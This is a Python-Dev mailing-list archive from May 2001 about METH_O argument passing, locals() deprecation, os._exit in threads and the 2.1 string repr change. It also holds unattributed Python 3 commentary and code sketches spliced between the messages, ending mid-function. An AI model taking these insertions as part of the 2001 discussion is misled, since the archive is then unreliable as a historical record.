TypeError: writelines() requires list of strings $ python2.0 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") >>> I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definitely not benefit 2.x's image wrt. stability ;P If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1.... -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Mon May 28 11:04:51 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:04:51 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B1214B3.9A4C295D@lemburg.com> Tim Peters wrote: > > [Tim] > > About combining strop and buffers and strings, don't forget > > unicodeobject.c: that's got oodles of basically duplicate code too. > > /F suggested dealing with the minor differences via maintaining one > > code file that gets compiled multiple times w/ appropriate #defines. > > [MAL] > > Hmm, that only saves us a few kB in source, but certainly not > > in the object files. > > That's not the point. Manually duplicated code blocks always get out of > synch, as people fix bugs in, or enhance, one of them but don't even know > about the others. /F brought this up after I pissed away a few hours trying > to repair one of these in all places, and he noted that strop.replace() and > string.replace() are woefully inefficient anyway. Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code. Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library.
Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode. > > The better idea would be making the types subclass from a generic > > abstract string object -- I just don't know how this will be > > possible with Guido's type patches. We'll just have to wait, > > I guess. > > Wait for what? If it were possible, is the chance that you'd take time to > rework unicodeobject.c to "subclass from a generic abstract string object" > greater than 0? The chance that I would is exactly 0. Well, that's hard to say. It would certainly be low-priority; same for the above refactoring. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 28 11:19:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:19:16 +0200 Subject: [Python-Dev] Special-casing "O" References: Message-ID: <3B121814.E5E9896A@lemburg.com> Tim Peters wrote: > > [Thomas Wouters] > > And don't forget the method-specific errormessage by passing ':len' in > > the format string. Of course, this can easily be (and probably should) > > done by passing another argument to whatever parses arguments in > > METH_O, rather than invoking string parsing magic every call. > > Martin's patch automatically inserts the name of the function in the > TypeError it raises when a METH_O call doesn't get exactly one argument, or > gets a (one or more) keyword argument. 
> > Stick to METH_O and it's a clear win, even in this respect: there's no info > in an explicit ":len" he's not already deducing, and almost all instances of > "O:name" formats today are exactly the same this way: > > if (!PyArg_ParseTuple(args, "O:abs", &v)) > if (!PyArg_ParseTuple(args, "O:callable", &v)) > if (!PyArg_ParseTuple(args, "O:id", &v)) > if (!PyArg_ParseTuple(args, "O:hash", &v)) > if (!PyArg_ParseTuple(args, "O:hex", &v)) > if (!PyArg_ParseTuple(args, "O:float", &v)) > if (!PyArg_ParseTuple(args, "O:len", &v)) > if (!PyArg_ParseTuple(args, "O:list", &v)) > else if (!PyArg_ParseTuple(args, "O:min/max", &v)) > if (!PyArg_ParseTuple(args, "O:oct", &v)) > if (!PyArg_ParseTuple(args, "O:ord", &obj)) > if (!PyArg_ParseTuple(args, "O:reload", &v)) > if (!PyArg_ParseTuple(args, "O:repr", &v)) > if (!PyArg_ParseTuple(args, "O:str", &v)) > if (!PyArg_ParseTuple(args, "O:tuple", &v)) > if (!PyArg_ParseTuple(args, "O:type", &v)) > > Those are all the ones in bltinmodule.c, and nearly all of them are called > extremely frequently in *some* programs. The only oddball is min/max, but > then it supports more than one call-list format and so isn't a METH_O > candidate anyway. Indeed, Martin's patch gives a *better* message than we > get for some mistakes today: > > >>> len(val=2) > Traceback (most recent call last): > File "<stdin>", line 1, in ? > TypeError: len() takes exactly 1 argument (0 given) > >>> > > Martin's would say > > TypeError: len takes no keyword arguments > > in this case. He should add "()" after the function name. He should also > throw away the half of the patch complicating and slowing METH_O to get some > theoretical speedup in other cases: make the one-arg builtins fly just as > fast as humanly possible. If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack.
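A METH_OBJARGS-style flag leaves open how the callee learns how many objects it was handed. One possible answer, sketched here in Python, is to keep a minimum and maximum count in the method table entry and pad missing optional arguments with a NULL marker, along the lines of the optional-argument handling MAL goes on to suggest. This is a sketch under those assumptions only: `ObjArgsMethod`, `NULL` and `my_getattr` are invented names, and the sentinel object stands in for a C NULL pointer so that a caller passing None stays distinguishable from a caller passing nothing:

```python
# Stand-in for a C NULL pointer: "this optional argument was not passed".
NULL = object()


class ObjArgsMethod:
    """Hypothetical method-table entry for an "O+"-style convention."""

    def __init__(self, name, func, min_args, max_args):
        self.name = name
        self.func = func
        self.min_args = min_args
        self.max_args = max_args

    def __call__(self, *args, **kwargs):
        if kwargs:
            raise TypeError("%s() takes no keyword arguments" % self.name)
        n = len(args)
        # One range check replaces parsing an "OO|O:getattr" string.
        if not self.min_args <= n <= self.max_args:
            raise TypeError("%s() takes %d to %d arguments (%d given)"
                            % (self.name, self.min_args, self.max_args, n))
        # Missing optional arguments arrive as NULL; the callee decides
        # which default that stands for.
        padded = args + (NULL,) * (self.max_args - n)
        return self.func(*padded)


def _getattr_impl(obj, name, default):
    if default is NULL:
        return getattr(obj, name)
    return getattr(obj, name, default)


my_getattr = ObjArgsMethod("getattr", _getattr_impl, 2, 3)
```

With this, `my_getattr(obj, "missing", None)` returns None while `my_getattr(obj, "missing")` raises AttributeError, as with the builtin. The trade-off Tim raises is visible as well: every call pays for the range check and the padding, even for entries whose minimum and maximum are both 1.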
In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value). This would take care of most builtins: Python/bltinmodule.c: -- if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq)) -- if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b)) -- if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w)) -- if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt)) -- if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value)) -- if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name)) -- if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z)) -- if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result)) -- if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls)) -- if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls)) -- if (!PyArg_ParseTuple(args, "O:abs", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict)) -- if (!PyArg_ParseTuple(args, "O:callable", &v)) -- if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i)) -- if (!PyArg_ParseTuple(args, "O:id", &v)) -- if (!PyArg_ParseTuple(args, "O:hash", &v)) -- if (!PyArg_ParseTuple(args, "O:hex", &v)) -- if (!PyArg_ParseTuple(args, "O:float", &v)) -- if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w)) -- if (!PyArg_ParseTuple(args, "O:len", &v)) -- if (!PyArg_ParseTuple(args, "O:list", &v)) -- if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step)) -- else if (!PyArg_ParseTuple(args, "O:min/max", &v)) -- if (!PyArg_ParseTuple(args, "O:oct", &v)) -- if (!PyArg_ParseTuple(args, "O:ord", &obj)) -- if (!PyArg_ParseTuple(args, "O:reload", &v)) -- if (!PyArg_ParseTuple(args, "O:repr", &v)) -- if (!PyArg_ParseTuple(args, "O:str", &v)) -- if (!PyArg_ParseTuple(args, "O:tuple", &v)) -- if (!PyArg_ParseTuple(args, "O:type", &v)) -- Marc-Andre 
Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Mon May 28 18:45:27 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 28 May 2001 12:45:27 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: <15122.32935.53414.174221@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: >> How is METH_O different than METH_OLDARGS? MvL> METH_O will raise an exception if the function is called with MvL> more than one argument, without calling the MvL> function. METH_OLDARGS will pass a tuple in this case. Yes, I see that now. I'm +1 on METH_O, then. Jeremy From tim.one at home.com Mon May 28 19:23:47 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 13:23:47 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I believe you cannot distinguish between a single tuple argument and > an invocation with multiple arguments in a METH_OLDARGS function, is > that true? That's the conclusion I reached after staring at the code.. From fdrake at acm.org Mon May 28 20:20:01 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:20:01 -0400 (EDT) Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: References: Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Andrew Kuchling writes: > Looking at a bug report Fred forwarded, I realized that after > py-howto.sourceforge.net was set up, www.python.org/doc/howto was > never changed to redirect to the SF site instead. As of this > afternoon, that's now done; links on www.python.org have been updated, > and I've added the redirect. 
> > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgotten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Mon May 28 20:33:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the documentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr.
PythonLabs at Digital Creations From tim.one at home.com Tue May 29 01:42:05 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 19:42:05 -0400 Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: [Guido] > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). [Fred L. Drake, Jr.] > Nothing has happened on this front yet. Should I add deprecation > notes to the documentation while Guido is on vacation, or wait to ask > him when he gets back? Or was this matter resolved when I wasn't > paying attention? I advise continuing to ignore it. Nothing was resolved, and to judge from a trial balloon I floated on c.l.py at the time, it's not a deprecation that will be greeted with enthusiasm. The problems range from people doing def f(...): ... print "..." % locals() to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one at home.com Tue May 29 02:01:33 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring.
I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one at home.com Tue May 29 02:42:54 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. 
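The METH_OLDARGS ambiguity Martin describes is easy to see in a small Python model of how such a method received its arguments: no arguments became NULL, a single argument was passed through as-is, and several arguments were bundled into a tuple. This is a sketch under those assumptions only. `oldargs_pack`, `writelines_oldargs` and `writelines_meth_o` are hypothetical names, and `collections.abc.Sequence` only approximates `PySequence_Check`:

```python
import collections.abc
import io

# Stand-in for a C NULL pointer ("called with no arguments").
NULL = object()


def oldargs_pack(*args):
    """Model of METH_OLDARGS: none -> NULL, one -> itself, many -> tuple."""
    if not args:
        return NULL
    if len(args) == 1:
        return args[0]
    return args


def writelines_oldargs(stream, *args):
    # Mirrors the quoted 2.0 check: the packed value only has to be a
    # sequence, so a multi-argument call passes as a tuple of lines.
    seq = oldargs_pack(*args)
    if seq is NULL or not isinstance(seq, collections.abc.Sequence):
        raise TypeError("writelines() argument must be a sequence of strings")
    for line in seq:
        stream.write(line)


def writelines_meth_o(stream, *args):
    # Under METH_O the count is checked first, so the same call is rejected.
    if len(args) != 1:
        raise TypeError("writelines() takes exactly one argument (%d given)"
                        % len(args))
    for line in args[0]:
        stream.write(line)


buf = io.StringIO()
writelines_oldargs(buf, "foo\n", "bar\n")   # accepted: packed into a tuple
print(repr(buf.getvalue()))                 # 'foo\nbar\n'

# The callee cannot tell these two calls apart:
print(oldargs_pack(("foo\n", "bar\n")) == oldargs_pack("foo\n", "bar\n"))  # True
```

With the METH_O version, `writelines_meth_o(buf, "foo\n", "bar\n")` raises TypeError. That is the change in semantics Thomas would rather phase in behind a warning first.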
The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one at home.com Tue May 29 03:14:16 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one at home.com Tue May 29 03:49:29 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) 
[Tim] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg at cosc.canterbury.ac.nz Tue May 29 04:12:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc.
| greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Tue May 29 04:33:58 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From jepler at mail.inetnebr.com Tue May 29 04:32:05 2001 From: jepler at mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. 
My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads." Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program". In fact, a traceback from the hung "sleep(1)" thread shows (gdb) where #0 0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45 #1 0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934 #2 0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34 #3 0x08067ba0 in PyThread_acquire_lock () at eval.c:41 #4 0x08051ff1 in PyEval_RestoreThread () at eval.c:41 #5 0x40019ef9 in floatsleep () at eval.c:41 #6 0x400193fd in time_sleep () at eval.c:41 [...] While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition. Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any. 
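If the goal is only to end the calling thread, there is a much gentler tool than os._exit(): raising SystemExit in that thread, which is what `thread.exit()` does (in Python 3 the module is spelled `_thread`). The sketch below assumes Python 3's `threading` module, which treats an uncaught SystemExit in a worker thread as a quiet exit. The thread unwinds normally and gives up the interpreter lock as usual, and the rest of the process keeps running:

```python
import _thread
import threading

events = []


def worker():
    events.append("worker started")
    # Raises SystemExit in this thread only; nothing process-wide happens.
    _thread.exit()
    events.append("never reached")


t = threading.Thread(target=worker)
t.start()
t.join()
events.append("main thread still running")
print(events)   # ['worker started', 'main thread still running']
```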
Jeff From tim.one at home.com Tue May 29 06:03:38 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:03:38 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010528213205.A1236@localhost.localdomain> Message-ID: [Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ] > My reasoning: The documentation for _exit() says it is "used to exit the > child process after a fork()", and my model for thinking about threads > is that they're "child processes, but ...". Thus, invoking os._exit() > in a thread made sense to me, meaning "ask the OS to destroy this thread > now, but leave my file descriptors, etc., alone for the other threads." You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (see the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it. > Your suggestion in the tracker of writing the equivalent C program is a > good one, though my suspicion (which I did not voice in the SF report) > was that perhaps the thread which called _exit() held the GIL, in which > case it was in some sense Python's fault that execution didn't continue. Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process.
But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it. > ... > Of course, if os._exit() has no intended use in a threaded program, Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences. > then this behavior is as good as any. And better than most . From tim.one at home.com Tue May 29 06:16:46 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 00:16:46 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> Message-ID: [Martin] > I took a special look at METH_OLDARGS occurrences. [GregE] > Shouldn't all these be removed? I would have thought > list.append was the last one! I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args:

    >>> {}.clear(2) # complains
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
    TypeError: function takes no arguments
    >>> {}.clear(val=12, hohoho=666) # accepts nonsense silently
    >>>

the-more-you-look-the-messier-it-gets-ly y'rs - tim From tim.one at home.com Tue May 29 08:06:19 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:06:19 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org> Message-ID: ESR> Apparently the Universe is an even more random place than I ESR> thought. [Barry A.
Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one at home.com Tue May 29 08:15:07 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg at aol.com > -----Original Message----- > From: python-list-admin at python.org > [mailto:python-list-admin at python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list at python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh at python.net Tue May 29 10:00:42 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? 
I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one at home.com Tue May 29 10:04:48 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas at xs4all.net Tue May 29 11:52:01 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? 
Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list at python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690 at xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
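Robin's problem is that octal-oriented tools such as traditional sed and awk choke on the `\x..` escapes that 2.1's string repr() now emits. One way to stop depending on repr() at all is to do the escaping explicitly. The following is a minimal sketch in Python 3, assuming byte-string input; `octal_escape` is a hypothetical helper written for illustration, not a standard-library function:

```python
def octal_escape(data: bytes) -> str:
    """Escape bytes using only octal escapes (hypothetical helper).

    Printable ASCII passes through unchanged; backslash and double quote
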